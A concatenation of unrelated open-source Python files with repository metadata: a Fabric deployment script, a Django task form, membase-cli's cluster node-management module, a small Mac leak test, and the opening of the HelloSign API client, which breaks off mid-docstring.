"id": "f1c6d66e2e31c6179803737f234fab89cce406cd",
"size": "10613",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/analyzer/algorithms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4028"
},
{
"name": "D",
"bytes": "3607"
},
{
"name": "JavaScript",
"bytes": "183301"
},
{
"name": "Python",
"bytes": "65719"
},
{
"name": "Shell",
"bytes": "68"
}
],
"symlink_target": ""
} |
from fabric.api import *
# Fabric deployment target: single host, fixed deploy user.
env.hosts = ['base102.net']
env.user = 'adewinter'
def push_local():
    """Push the local master branch to origin."""
    local('git push origin master') # runs the command on the local environment
def pull_remote():
    """Update the remote checkout at /opt/www/bitpay-shopify from origin/master."""
    with cd('/opt/www/bitpay-shopify'):
        run('whoami')  # sanity check: shows which remote user runs the pull
        run('git pull origin master') # runs the command on the remote environment
def supervisor_cmd(cmd):
    """Run `supervisorctl <cmd> all` on the remote host via sudo."""
    sudo('supervisorctl %s all' % cmd)
def supervisor_restart():
    """Restart all supervisor-managed processes on the remote host."""
    supervisor_cmd('restart')
def supervisor_start():
    """Start all supervisor-managed processes on the remote host."""
    supervisor_cmd('start')
def supervisor_stop():
    """Stop all supervisor-managed processes on the remote host."""
    supervisor_cmd('stop')
def nginx_cmd(cmd):
    """Run the nginx init script with <cmd> on the remote host via sudo."""
    sudo('/etc/init.d/nginx %s' % cmd)
def nginx_restart():
    """Restart nginx on the remote host."""
    nginx_cmd('restart')
def nginx_stop():
    """Stop nginx on the remote host."""
    nginx_cmd('stop')
def nginx_start():
    """Start nginx on the remote host."""
    nginx_cmd('start')
def deploy():
    """Full deploy: push local master, pull it on the server, then bounce
    supervisor-managed processes and nginx."""
    push_local()
    pull_remote()
    supervisor_restart()
    nginx_restart()
| {
"content_hash": "3746357b3262ddf020f55a005cd98673",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 83,
"avg_line_length": 16.339622641509433,
"alnum_prop": 0.6397228637413395,
"repo_name": "adewinter/bitpay-shopify",
"id": "79606a5d7b4cc621d7272f25a4190d3495c087c0",
"size": "866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5128"
},
{
"name": "Python",
"bytes": "25867"
}
],
"symlink_target": ""
} |
from django import forms
from django.utils.translation import ugettext_lazy as _
from student.apps.courses.tasks.models import Task
#Task form
class TaskForm(forms.Form):
    """Form used to create and update Task instances for a chapter."""
    text = forms.CharField(label=_("Text"), required=True)
    explanation = forms.CharField(label=_("Explanation"), required=False)
    note = forms.IntegerField(label=_("Note"), required=True)
    task_type = forms.IntegerField(label=_("Task type"), required=True)
    def clean(self):
        # No cross-field validation yet; hand back the data unchanged.
        return self.cleaned_data
    def create(self, request, user, chapter):
        """Build, save and return a new Task from the validated form data."""
        data = self.cleaned_data
        new_task = Task(
            author=user,
            chapter=chapter,
            text=data["text"],
            explanation=data["explanation"],
            note=data["note"],
            task_type=data["task_type"],
        )
        new_task.save()
        return new_task
    def update(self, request, task):
        """Copy the validated form data onto an existing Task, save and return it."""
        data = self.cleaned_data
        for field_name in ("text", "explanation", "note", "task_type"):
            setattr(task, field_name, data[field_name])
        task.save()
        return task
| {
"content_hash": "1fbd0c88c4f6ce70357bfa27237bd34b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 73,
"avg_line_length": 34.13513513513514,
"alnum_prop": 0.5811559778305622,
"repo_name": "houssemFat/MeeM-Dev",
"id": "c526ace05115f453554cb3648ee19a312490038f",
"size": "1263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "teacher/apps/courses/tasks/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "54148"
},
{
"name": "HTML",
"bytes": "360877"
},
{
"name": "JavaScript",
"bytes": "1651985"
},
{
"name": "Nginx",
"bytes": "1597"
},
{
"name": "PHP",
"bytes": "3195"
},
{
"name": "Python",
"bytes": "374180"
},
{
"name": "Smarty",
"bytes": "7600"
}
],
"symlink_target": ""
} |
"""
Implementation for rebalance, add, remove, stop rebalance.
"""
import time
import os
import sys
import util_cli as util
import socket
from usage import usage
from restclient import *
from listservers import *
# the rest commands and associated URIs for various node operations
rest_cmds = {
    'rebalance' :'/controller/rebalance',
    'rebalance-stop' :'/controller/stopRebalance',
    'rebalance-status' :'/pools/default/rebalanceProgress',
    'server-add' :'/controller/addNode',
    'server-readd' :'/controller/reAddNode',
    'failover' :'/controller/failOver',
    'cluster-init' :'/settings/web',
    'node-init' :'/nodes/self/controller/settings',
}
# Commands that do not accept --server-remove.
server_no_remove = [
    'rebalance-stop',
    'rebalance-status',
    'server-add',
    'server-readd',
    'failover'
]
# Commands that do not accept --server-add and friends.
server_no_add = [
    'rebalance-stop',
    'rebalance-status',
    'failover',
]
# Map of operations and the HTTP methods used against the REST interface
methods = {
    'rebalance' :'POST',
    'rebalance-stop' :'POST',
    'rebalance-status' :'GET',
    'eject-server' :'POST',
    'server-add' :'POST',
    'server-readd' :'POST',
    'failover' :'POST',
    'cluster-init' :'POST',
    'node-init' :'POST',
}
# Map of HTTP success code, success message and error message for
# handling HTTP response properly
class Node:
    """Dispatcher for node-level cluster operations (rebalance, server
    add/re-add, failover, cluster-init, node-init) performed against the
    management REST API. Results are printed to stdout; bad command-line
    arguments exit through usage()."""
    def __init__(self):
        # Defaults only; runCmd() overwrites these from its arguments.
        self.rest_cmd = rest_cmds['rebalance-status']
        self.method = 'GET'
        self.debug = False
        self.server = ''
        self.port = ''
        self.user = ''
        self.password = ''
        self.params = {}
        self.output = 'standard'
        # cluster-init options (None means "not requested / keep current").
        self.password_new = None
        self.username_new = None
        self.port_new = None
        self.per_node_quota = None
        # node-init option: node data directory.
        self.data_path = None
    def runCmd(self, cmd, server, port,
               user, password, opts):
        """Parse command-line opts, then dispatch `cmd` against server:port
        using the given credentials."""
        self.rest_cmd = rest_cmds[cmd]
        self.method = methods[cmd]
        self.server = server
        self.port = int(port)
        self.user = user
        self.password = password
        servers = self.processOpts(cmd, opts)
        if self.debug:
            print "INFO: servers %s" % servers
        if cmd == 'server-add' and not servers['add']:
            usage("please list one or more --server-add=HOST[:PORT];"
                  " or use -h for more help.")
        if cmd == 'server-readd' and not servers['add']:
            usage("please list one or more --server-add=HOST[:PORT];"
                  " or use -h for more help.")
        # rebalance implicitly adds any --server-add servers first.
        if cmd in ('server-add', 'rebalance'):
            self.addServers(servers['add'])
        if cmd == 'rebalance':
            self.rebalance(servers)
        if cmd == 'server-readd':
            self.reAddServers(servers)
        if cmd == 'rebalance-status':
            output_result = self.rebalanceStatus()
            print output_result
        if cmd == 'rebalance-stop':
            output_result = self.rebalanceStop()
            print output_result
        if cmd == 'failover':
            if len(servers['failover']) <= 0:
                usage("please list one or more --server-failover=HOST[:PORT];"
                      " or use -h for more help.")
            self.failover(servers)
        if cmd == 'cluster-init':
            self.clusterInit()
        if cmd == 'node-init':
            self.nodeInit()
    def clusterInit(self):
        """Apply cluster credentials/port via /settings/web, then (if
        requested) set the per-node memory quota, which lives at a
        different endpoint (/pools/default)."""
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        if self.port_new:
            rest.setParam('port', self.port_new)
        else:
            rest.setParam('port', 'SAME')
        rest.setParam('initStatus', 'done')
        if self.username_new:
            rest.setParam('username', self.username_new)
        else:
            rest.setParam('username', self.user)
        if self.password_new:
            rest.setParam('password', self.password_new)
        else:
            rest.setParam('password', self.password)
        opts = {}
        opts['error_msg'] = "unable to init %s" % self.server
        opts['success_msg'] = "init %s" % self.server
        output_result = rest.restCmd(self.method,
                                     self.rest_cmd,
                                     self.user,
                                     self.password,
                                     opts)
        print output_result
        # per node quota unfortunately runs against a different location
        if not self.per_node_quota:
            return
        # Credentials/port may have just been changed above; use the new
        # values for the follow-up request.
        if self.port_new:
            self.port = int(self.port_new)
        if self.username_new:
            self.user = self.username_new
        if self.password_new:
            self.password = self.password_new
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        if self.per_node_quota:
            rest.setParam('memoryQuota', self.per_node_quota)
        output_result = rest.restCmd(self.method,
                                     '/pools/default',
                                     self.user,
                                     self.password,
                                     opts)
        print output_result
    def nodeInit(self):
        """Set this node's data directory via the node-init REST endpoint."""
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        if self.data_path:
            rest.setParam('path', self.data_path)
        opts = {}
        opts['error_msg'] = "unable to init %s" % self.server
        opts['success_msg'] = "init %s" % self.server
        output_result = rest.restCmd(self.method,
                                     self.rest_cmd,
                                     self.user,
                                     self.password,
                                     opts)
        print output_result
    def processOpts(self, cmd, opts):
        """ Set standard opts.
        note: use of a server key keeps optional
        args aligned with server.

        Returns a dict with 'add' (hostport -> {'user','password'}),
        'remove' and 'failover' (hostport -> True) entries; also mutates
        self for output/debug/cluster-init/node-init options.
        """
        servers = {
            'add': {},
            'remove': {},
            'failover': {}
        }
        # don't allow options that don't correspond to given commands
        for o, a in opts:
            usage_msg = "option '%s' is not used with command '%s'" % (o, cmd)
            if o in ( "-r", "--server-remove"):
                if cmd in server_no_remove:
                    usage(usage_msg)
            elif o in ( "-a", "--server-add",
                        "--server-add-username",
                        "--server-add-password"):
                if cmd in server_no_add:
                    usage(usage_msg)
        server = None
        for o, a in opts:
            if o in ("-a", "--server-add"):
                if a == "self":
                    # Resolve "self" to this machine's address.
                    a = socket.gethostbyname(socket.getfqdn())
                server = "%s:%d" % util.hostport(a)
                servers['add'][server] = { 'user':'', 'password':''}
            elif o == "--server-add-username":
                if server is None:
                    usage("please specify --server-add"
                          " before --server-add-username")
                servers['add'][server]['user'] = a
            elif o == "--server-add-password":
                if server is None:
                    usage("please specify --server-add"
                          " before --server-add-password")
                servers['add'][server]['password'] = a
            elif o in ( "-r", "--server-remove"):
                server = "%s:%d" % util.hostport(a)
                servers['remove'][server] = True
                server = None
            # NOTE(review): ("--server-failover") is a plain string, not a
            # 1-tuple, so `in` is a substring test rather than membership;
            # it works for the exact option but should be written
            # ("--server-failover",).
            elif o in ( "--server-failover"):
                server = "%s:%d" % util.hostport(a)
                servers['failover'][server] = True
                server = None
            elif o in ('-o', '--output'):
                if a == 'json':
                    self.output = a
                server = None
            elif o in ('-d', '--debug'):
                self.debug = True
                server = None
            elif o == '--cluster-init-password':
                self.password_new = a
            elif o == '--cluster-init-username':
                self.username_new = a
            elif o == '--cluster-init-port':
                self.port_new = a
            elif o == '--cluster-init-ramsize':
                self.per_node_quota = a
            elif o == '--node-init-data-path':
                self.data_path = a
        return servers
    def addServers(self, servers):
        """Add every server in `servers` (hostport -> credentials dict) to
        the cluster, printing each result."""
        for server in servers:
            user = servers[server]['user']
            password = servers[server]['password']
            output_result = self.serverAdd(server,
                                           user,
                                           password)
            print output_result
    def serverAdd(self, add_server, add_with_user, add_with_password):
        """POST a single addNode request; returns the formatted result
        string from the REST client."""
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        rest.setParam('hostname', add_server)
        if add_with_user and add_with_password:
            rest.setParam('user', add_with_user)
            rest.setParam('password', add_with_password)
        opts = {}
        opts['error_msg'] = "unable to server-add %s" % add_server
        opts['success_msg'] = "server-add %s" % add_server
        output_result = rest.restCmd('POST',
                                     rest_cmds['server-add'],
                                     self.user,
                                     self.password,
                                     opts)
        return output_result
    def reAddServers(self, servers):
        """Re-add previously failed-over servers, identified via their otp
        node ids, printing each result."""
        known_otps, eject_otps, failover_otps, readd_otps = \
            self.getNodeOtps(to_readd=servers['add'])
        for readd_otp in readd_otps:
            rest = restclient.RestClient(self.server,
                                         self.port,
                                         {'debug':self.debug})
            rest.setParam('otpNode', readd_otp)
            opts = {}
            opts['error_msg'] = "unable to re-add %s" % readd_otp
            opts['success_msg'] = "re-add %s" % readd_otp
            output_result = rest.restCmd('POST',
                                         rest_cmds['server-readd'],
                                         self.user,
                                         self.password,
                                         opts)
            print output_result
    def getNodeOtps(self, to_eject=[], to_failover=[], to_readd=[]):
        """ Convert known nodes into otp node id's.

        Returns (known_otps, eject_otps, failover_otps, readd_otps).
        NOTE(review): mutable default arguments are shared between calls;
        harmless here because they are only read, never mutated.
        """
        listservers = ListServers()
        known_nodes_list = listservers.getNodes(
                                listservers.getData(self.server,
                                                    self.port,
                                                    self.user,
                                                    self.password))
        known_otps = []
        eject_otps = []
        failover_otps = []
        readd_otps = []
        for node in known_nodes_list:
            if node.get('otpNode') is None:
                raise Exception("could not access node;" +
                                " please check your username (-u) and password (-p)")
            known_otps.append(node['otpNode'])
            if node['hostname'] in to_eject:
                eject_otps.append(node['otpNode'])
            if node['hostname'] in to_failover:
                # Only active cluster members can be failed over.
                if node['clusterMembership'] != 'active':
                    raise Exception('node %s is not active' % node['hostname'])
                else:
                    failover_otps.append(node['otpNode'])
            if node['hostname'] in to_readd:
                readd_otps.append(node['otpNode'])
        return (known_otps, eject_otps, failover_otps, readd_otps)
    def rebalance(self, servers):
        """Kick off a rebalance (ejecting any --server-remove nodes), then
        poll rebalanceProgress until it finishes, printing progress dots.
        Exits the process with status 1 on a rebalance error."""
        known_otps, eject_otps, failover_otps, readd_otps = \
            self.getNodeOtps(to_eject=servers['remove'])
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        rest.setParam('knownNodes', ','.join(known_otps))
        rest.setParam('ejectedNodes', ','.join(eject_otps))
        opts = {}
        opts['success_msg'] = 'rebalanced cluster'
        opts['error_msg'] = 'unable to rebalance cluster'
        output_result = rest.restCmd('POST',
                                     rest_cmds['rebalance'],
                                     self.user,
                                     self.password,
                                     opts)
        if self.debug:
            print "INFO: rebalance started: %s" % output_result
        # Re-open stdout unbuffered so the progress dots appear immediately.
        sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
        print "INFO: rebalancing",
        status, error = self.rebalanceStatus(prefix='\n')
        while status == 'running':
            print ".",
            time.sleep(0.5)
            try:
                status, error = self.rebalanceStatus(prefix='\n')
            except socket.error:
                # Transient connection hiccup mid-rebalance; pause longer
                # and retry once.
                time.sleep(2)
                status, error = self.rebalanceStatus(prefix='\n')
        if error:
            print '\n' + error
            sys.exit(1)
        else:
            print '\n' + output_result
    def rebalanceStatus(self, prefix=''):
        """Return (status, error_message) from the rebalanceProgress
        endpoint; exits the process when the server answers with a list
        (error payload)."""
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        opts = { 'error_msg':'unable to obtain rebalance status'}
        output_result = rest.restCmd('GET',
                                     rest_cmds['rebalance-status'],
                                     self.user,
                                     self.password,
                                     opts)
        json = rest.getJson(output_result)
        if type(json) == type(list()):
            print prefix + ("ERROR: %s" % json[0])
            sys.exit(1)
        if 'errorMessage' in json:
            error_message = json['errorMessage']
        else:
            error_message = None
        return json['status'],error_message
    def rebalanceStop(self):
        """POST a stopRebalance request; returns the formatted result."""
        rest = restclient.RestClient(self.server,
                                     self.port,
                                     {'debug':self.debug})
        opts = {}
        opts['success_msg'] = 'rebalance cluster stopped'
        opts['error_msg'] = 'unable to stop rebalance'
        output_result = rest.restCmd('POST',
                                     rest_cmds['rebalance-stop'],
                                     self.user,
                                     self.password,
                                     opts)
        return output_result
    def failover(self, servers):
        """Fail over each --server-failover node (must be an active cluster
        member), printing each result."""
        known_otps, eject_otps, failover_otps, readd_otps = \
            self.getNodeOtps(to_failover=servers['failover'])
        if len(failover_otps) <= 0:
            usage("specified servers are not part of the cluster: %s" %
                  servers['failover'].keys())
        for failover_otp in failover_otps:
            rest = restclient.RestClient(self.server,
                                         self.port,
                                         {'debug':self.debug})
            rest.setParam('otpNode', failover_otp)
            opts = {}
            opts['error_msg'] = "unable to failover %s" % failover_otp
            opts['success_msg'] = "failover %s" % failover_otp
            output_result = rest.restCmd('POST',
                                         rest_cmds['failover'],
                                         self.user,
                                         self.password,
                                         opts)
            print output_result
| {
"content_hash": "9b1ad58a1e966193aa73c6acff25ff51",
"timestamp": "",
"source": "github",
"line_count": 460,
"max_line_length": 85,
"avg_line_length": 35.14782608695652,
"alnum_prop": 0.4631370608609599,
"repo_name": "membase/membase-cli",
"id": "1e9800cb74bf4ba6d12b0cf90f4f7947dc6977a6",
"size": "16168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "node.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "1254"
},
{
"name": "Python",
"bytes": "444592"
},
{
"name": "Shell",
"bytes": "1778"
}
],
"symlink_target": ""
} |
import sys
# Python 2 file (note the `raise Class, "msg"` syntax): refuse to run
# anywhere but Mac OS X, where the gestalt reproducer below is meaningful.
if sys.platform != 'darwin':
    raise ValueError, "This test only leaks on Mac OS X"
def leak():
    # taken from platform._mac_ver_lookup()
    # Calls gestalt('sysu') once per invocation; MacOS.Error is swallowed
    # because the selector may be unavailable -- presumably the repeated
    # call itself is what reproduces the leak (this file lives under
    # test/leakers/), not its result.
    from gestalt import gestalt
    import MacOS
    try:
        gestalt('sysu')
    except MacOS.Error:
        pass
| {
"content_hash": "9829ef75ddf5de16197a2a3d5cb45148",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 56,
"avg_line_length": 20.642857142857142,
"alnum_prop": 0.5986159169550173,
"repo_name": "babyliynfg/cross",
"id": "ac6522bcf21a34d3080e6ef18f3a1f0394603e37",
"size": "289",
"binary": false,
"copies": "16",
"ref": "refs/heads/master",
"path": "tools/project-creator/Python2.6.6/Lib/test/leakers/test_gestalt.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "36722"
},
{
"name": "C",
"bytes": "6345646"
},
{
"name": "C++",
"bytes": "15980000"
},
{
"name": "CMake",
"bytes": "1238"
},
{
"name": "GLSL",
"bytes": "64406"
},
{
"name": "HTML",
"bytes": "147661"
},
{
"name": "Java",
"bytes": "574078"
},
{
"name": "JavaScript",
"bytes": "503327"
},
{
"name": "Makefile",
"bytes": "18778"
},
{
"name": "Objective-C",
"bytes": "396703"
},
{
"name": "Objective-C++",
"bytes": "378740"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "15265548"
},
{
"name": "Roff",
"bytes": "23"
},
{
"name": "Shell",
"bytes": "61021"
},
{
"name": "Visual Basic",
"bytes": "19200"
}
],
"symlink_target": ""
} |
from hellosign_sdk.utils import HSRequest, HSException, NoAuthMethod, HSAccessTokenAuth, HSFormat, api_resource, api_resource_list
from hellosign_sdk.resource import Account, ApiApp, SignatureRequest, Template, Team, Embedded, UnclaimedDraft
from requests.auth import HTTPBasicAuth
import json
#
# The MIT License (MIT)
#
# Copyright (C) 2014 hellosign.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class HSClient(object):
''' Client object to interact with the API urls
Most of the operations of the SDK is made through this object. Please refer
to the README.rst file for more details on how to use the client object.
'''
version = '4.0.0' # SDK version
API_VERSION = 'v3' # API version
API_URL = ''
ACCOUNT_CREATE_URL = ''
ACCOUNT_INFO_URL = ''
ACCOUNT_UPDATE_URL = ''
ACCOUNT_VERIFY_URL = ''
SIGNATURE_REQUEST_INFO_URL = ''
SIGNATURE_REQUEST_LIST_URL = ''
SIGNATURE_REQUEST_DOWNLOAD_PDF_URL = ''
SIGNATURE_REQUEST_CREATE_URL = ''
SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL = ''
SIGNATURE_REQUEST_REMIND_URL = ''
SIGNATURE_REQUEST_CANCEL_URL = ''
SIGNATURE_REQUEST_CREATE_EMBEDDED_URL = ''
SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL = ''
EMBEDDED_OBJECT_GET_URL = ''
EMBEDDED_TEMPLATE_EDIT_URL = ''
UNCLAIMED_DRAFT_CREATE_URL = ''
UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL = ''
UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL = ''
UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL = ''
TEMPLATE_GET_URL = ''
TEMPLATE_GET_LIST_URL = ''
TEMPLATE_GET_FILES_URL = ''
TEMPLATE_DELETE_URL = ''
TEMPLATE_ADD_USER_URL = ''
TEMPLATE_REMOVE_USER_URL = ''
TEMPLATE_CREATE_EMBEDDED_DRAFT_URL = ''
TEAM_INFO_URL = ''
TEAM_UPDATE_URL = ''
TEAM_CREATE_URL = ''
TEAM_DESTROY_URL = ''
TEAM_ADD_MEMBER_URL = ''
TEAM_REMOVE_MEMBER_URL = ''
API_APP_INFO_URL = ''
API_APP_LIST_URL = ''
API_APP_CREATE_URL = ''
API_APP_UPDATE_URL = ''
API_APP_DELETE_URL = ''
OAUTH_TOKEN_URL = ''
request = None
response_callback = None
def __init__(self, email_address=None, password=None, api_key=None, access_token=None, access_token_type='Bearer', env='production'):
    '''Initialize the client object with authentication information to send requests
    Args:
        email_address (str): E-mail of the account to make the requests
        password (str): Password of the account used with email address
        api_key (str): API Key. You can find your API key in https://app.hellosign.com/home/myAccount/current_tab/integrations#api
        access_token (str): OAuth access token to use
        access_token_type (str): Type of OAuth token (defaults to Bearer, which is the only value supported for now)
        env (str): Target environment, one of "production", "dev" or "staging". Defaults to "production".
    '''
    super(HSClient, self).__init__()
    # Resolve the supplied credentials into an auth object (helper defined elsewhere in this class)
    self.auth = self._authenticate(email_address, password, api_key, access_token, access_token_type)
    self.account = Account()
    self.env = env
    # Build every *_URL attribute for the chosen environment (must run after self.env is set)
    self._init_endpoints()
def __str__(self):
''' Return a string description of this object '''
return "HelloSign Client %s" % self.version
def _init_endpoints(self):
API_PRODUCTION_URL = "https://api.hellosign.com"
API_DEV_URL = "https://api.dev-hellosign.com"
API_STAGING_URL = "https://api.staging-hellosign.com"
WEB_PRODUCTION_URL = "https://app.hellosign.com"
WEB_DEV_URL = "https://app.dev-hellosign.com"
WEB_STAGING_URL = "https://app.staging-hellosign.com"
if self.env == "production":
self.API_URL = API_PRODUCTION_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_PRODUCTION_URL + '/oauth/token'
elif self.env == "dev":
self.API_URL = API_DEV_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_DEV_URL + '/oauth/token'
print("WARNING: Using dev api endpoint %s" % self.API_URL)
elif self.env == "staging":
self.API_URL = API_STAGING_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_STAGING_URL + '/oauth/token'
print("WARNING: Using staging api endpoint %s" % self.API_URL)
self.ACCOUNT_CREATE_URL = self.API_URL + '/account/create'
self.ACCOUNT_INFO_URL = self.API_URL + '/account'
self.ACCOUNT_UPDATE_URL = self.API_URL + '/account'
self.ACCOUNT_VERIFY_URL = self.API_URL + '/account/verify'
self.SIGNATURE_REQUEST_INFO_URL = self.API_URL + '/signature_request/'
self.SIGNATURE_REQUEST_LIST_URL = self.API_URL + '/signature_request/list'
self.SIGNATURE_REQUEST_DOWNLOAD_PDF_URL = self.API_URL + '/signature_request/files/'
self.SIGNATURE_REQUEST_CREATE_URL = self.API_URL + '/signature_request/send'
self.SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL = self.API_URL + '/signature_request/send_with_template'
self.SIGNATURE_REQUEST_REMIND_URL = self.API_URL + '/signature_request/remind/'
self.SIGNATURE_REQUEST_UPDATE_URL = self.API_URL + '/signature_request/update/'
self.SIGNATURE_REQUEST_CANCEL_URL = self.API_URL + '/signature_request/cancel/'
self.SIGNATURE_REQUEST_REMOVE_ACCESS_URL = self.API_URL + '/signature_request/remove/'
self.SIGNATURE_REQUEST_CREATE_EMBEDDED_URL = self.API_URL + '/signature_request/create_embedded'
self.SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL = self.API_URL + '/signature_request/create_embedded_with_template'
self.EMBEDDED_OBJECT_GET_URL = self.API_URL + '/embedded/sign_url/'
self.EMBEDDED_TEMPLATE_EDIT_URL = self.API_URL + '/embedded/edit_url/'
self.UNCLAIMED_DRAFT_CREATE_URL = self.API_URL + '/unclaimed_draft/create'
self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL = self.API_URL + '/unclaimed_draft/create_embedded'
self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL = self.API_URL + '/unclaimed_draft/create_embedded_with_template'
self.UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL = self.API_URL + '/unclaimed_draft/edit_and_resend/'
self.TEMPLATE_GET_URL = self.API_URL + '/template/'
self.TEMPLATE_GET_LIST_URL = self.API_URL + '/template/list'
self.TEMPLATE_GET_FILES_URL = self.API_URL + '/template/files/'
self.TEMPLATE_DELETE_URL = self.API_URL + '/template/delete/'
self.TEMPLATE_ADD_USER_URL = self.API_URL + '/template/add_user/'
self.TEMPLATE_REMOVE_USER_URL = self.API_URL + '/template/remove_user/'
self.TEMPLATE_CREATE_EMBEDDED_DRAFT_URL = self.API_URL + '/template/create_embedded_draft'
self.TEMPLATE_UPDATE_FILES_URL = self.API_URL + '/template/update_files/'
self.TEAM_INFO_URL = self.API_URL + '/team'
self.TEAM_UPDATE_URL = self.TEAM_INFO_URL
self.TEAM_CREATE_URL = self.API_URL + '/team/create'
self.TEAM_DESTROY_URL = self.API_URL + '/team/destroy'
self.TEAM_ADD_MEMBER_URL = self.API_URL + '/team/add_member'
self.TEAM_REMOVE_MEMBER_URL = self.API_URL + '/team/remove_member'
self.API_APP_INFO_URL = self.API_URL + '/api_app/'
self.API_APP_LIST_URL = self.API_URL + '/api_app/list'
self.API_APP_CREATE_URL = self.API_URL + '/api_app'
self.API_APP_UPDATE_URL = self.API_APP_INFO_URL
self.API_APP_DELETE_URL = self.API_APP_INFO_URL
# ---- ACCOUNT METHODS -----------------------------
@api_resource(Account)
def create_account(self, email_address, password=None, client_id=None, client_secret=None):
    ''' Create a new account
    When created via an app, Account.oauth will contain the OAuth data that
    can be used to execute actions on behalf of the newly created account.
    Args:
        email_address (str): Email address of the new account to create
        password (str): [DEPRECATED] This parameter will be ignored
        client_id (str, optional): Client id of the app to use to create this account
        client_secret (str, optional): Secret of the app to use to create this account
    Returns:
        The new Account object
    '''
    payload = {'email_address': email_address}
    if client_id:
        payload['client_id'] = client_id
        payload['client_secret'] = client_secret
    resp = self._get_request().post(self.ACCOUNT_CREATE_URL, payload)
    # Surface app OAuth credentials on the account payload for the decorator.
    if 'oauth_data' in resp:
        resp["account"]["oauth"] = resp['oauth_data']
    return resp
# Get account info and put in self.account so that further access to the
# info can be made by using self.account.attribute
def get_account_info(self):
    ''' Fetch the current account's information
    The result is cached on `self.account`, so attributes can later be read
    directly, e.g.:
    >>> hsclient = HSClient()
    >>> acct = hsclient.get_account_info()
    >>> print acct.email_address
    Returns:
        An Account object
    '''
    resp = self._get_request().get(self.ACCOUNT_INFO_URL)
    self.account.json_data = resp["account"]
    return self.account
# At the moment you can only update your callback_url only
@api_resource(Account)
def update_account_info(self):
    ''' Update the current account's information
    Only the callback_url can be updated at the moment; the value sent is
    taken from `self.account.callback_url`.
    Returns:
        An Account object
    '''
    payload = {'callback_url': self.account.callback_url}
    return self._get_request().post(self.ACCOUNT_UPDATE_URL, payload)
def verify_account(self, email_address):
    ''' Check whether a HelloSign Account exists for the given email address
    Args:
        email_address (str): Email address to verify
    Returns:
        True or False
    '''
    response = self._get_request().post(self.ACCOUNT_VERIFY_URL, {
        'email_address': email_address
    })
    return 'account' in response
# ---- SIGNATURE REQUEST METHODS -------------------
@api_resource(SignatureRequest)
def get_signature_request(self, signature_request_id):
    ''' Get a signature request by its ID
    Args:
        signature_request_id (str): The id of the SignatureRequest to retrieve
    Returns:
        A SignatureRequest object
    '''
    url = self.SIGNATURE_REQUEST_INFO_URL + signature_request_id
    return self._get_request().get(url, parameters=None)
@api_resource_list(SignatureRequest)
def get_signature_request_list(self, page=1, page_size=None):
    ''' List the SignatureRequests you can access
    Includes SignatureRequests you have sent as well as received, but not
    ones you have only been CCed on.
    Args:
        page (int, optional): Page number of the list to return. Defaults to 1.
        page_size (int, optional): SignatureRequests per page; the API defaults to 20.
    Returns:
        A ResourceList object
    '''
    query_params = {"page": page, "page_size": page_size}
    return self._get_request().get(self.SIGNATURE_REQUEST_LIST_URL, parameters=query_params)
def get_signature_request_file(self, signature_request_id, path_or_file=None, file_type=None, filename=None, response_type=None):
    ''' Download a copy of the signature request's documents
    Args:
        signature_request_id (str): Id of the signature request
        path_or_file (str or file): A writable file-like object or a full path to save the file to.
        filename (str): [DEPRECATED] Full path to save the file to.
        file_type (str): "pdf" for a single merged document (default) or "zip"
            for a collection of individual documents.
        response_type (str): "url" to return a URL link to the file, or
